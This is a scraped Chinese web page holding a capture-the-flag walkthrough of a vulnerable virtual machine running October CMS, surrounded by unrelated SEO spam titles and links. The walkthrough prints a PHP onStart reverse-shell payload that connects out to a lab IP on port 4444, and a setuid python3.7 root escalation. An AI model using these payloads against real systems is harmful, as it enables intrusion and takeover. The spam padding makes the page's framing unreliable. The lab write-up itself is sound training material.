当前位置: 首页 > news >正文

青岛企业建站系统威海推广

青岛企业建站系统,威海推广,中国国内网站建设哪家强,石家庄平台公司环境准备 靶机链接#xff1a;百度网盘 请输入提取码 提取码#xff1a;3e4s 虚拟机网络链接模式#xff1a;桥接模式 攻击机系统#xff1a;kali linux 2021.1 信息收集 1.探测目标靶机ip。 2.探测靶机开放端口和服务情况。 漏洞探测 1.访问网页 2.用dirsearch扫描… 环境准备 靶机链接百度网盘 请输入提取码 提取码3e4s 虚拟机网络链接模式桥接模式 攻击机系统kali linux 2021.1 信息收集 1.探测目标靶机ip。 2.探测靶机开放端口和服务情况。 漏洞探测 1.访问网页 2.用dirsearch扫描目录 dirsearch -u 192.168.1.101 3.访问目录是一个登录界面 4.查看下8080端口的源码发现一个超链接信息 5.访问这个信息发现用户名密码 user - admin password - adminadmin2 6.成功登录第三步的登录界面 漏洞利用 1.谷歌下发现这个October十月是一个用php语言搭建的cms 2.上传不了文件 3.虽然不能上传文件但可以添加一个网页 4.保存之后点击preview ; 发现报错位置在右下角的code,这应该要php代码 5.直接谷歌 october cms code reverse shell 6.直接将查到的信息粘贴进code里 function onStart() { echo 123; } 7.再点击preview后没有报错说明成功添加了一个网页 8.这次直接把code下面换成反弹shell的php代码用exech函数来执行 function onStart() { echo exec(bash -c bash -i /dev/tcp/192.168.1.106/4444 01); } 权限提升 1.开启监听后点击preview即可回弹shell 2.发现python3.7有root权限 3.直接提权成功拿下 /usr/bin/python3.7 -c import os; os.execl(/bin/sh, sh, -p)
http://www.yingshimen.cn/news/115911/

相关文章:

  • html5网站用什么软件wordpress媒体库现实不全
  • 淘宝网站建设多少钱宁波网站推广方法
  • 湛江公司网站建设陕西住房与城乡建设厅网站
  • 在线代理的网站商品房建设信息网站
  • 青峰网站建设w微信网站开发
  • 做网站建设个体经营小微企业长沙仿站模板网站建设
  • 用asp.net做后台网站鲜花网站建设
  • 网站诊断内容餐饮吸引客流的活动方案
  • 展示型网站建设的标准asp网站转html
  • 网站市场推广太原搜索引擎推广
  • 武进网站建设怎么样如何检测网站的打开速度
  • 广州微网站建设价位微分销系统价格
  • 书画网站 建站网站不同
  • wordpress建的大型网站上市设计公司网站
  • 做网站会员推广哪个好成立公司需要注意哪些问题
  • 嘉兴cms建站模板整站优化多少钱
  • 小米网站建设项目书wordpress咨询
  • 描述网站建设的基本流程网站图片要多少像素
  • 漳州最便宜的网站建设价格企业seo推广的绝密诀窍曝光
  • 中国建设银行网站登录免费引流推广
  • 网站建设服务优势网站做全好吗
  • 六安官网昆明seocn整站优化
  • 网站备案完成网站开发设计费用
  • 如何建网站并做推广织梦模板大气网站建设类网站模板下载
  • 杭州建设工程信息网站网站如何调用手机淘宝做淘宝客
  • 智能建站网站模板怎么关闭网站安全检测
  • 做网站的公司如何运营网络推广文案图片
  • 建设银行银行号查询网站苏州纳米所加工平台
  • 上海市网站开发游戏网址大全有哪些
  • 河海大学学风建设网站产品艺术设计专业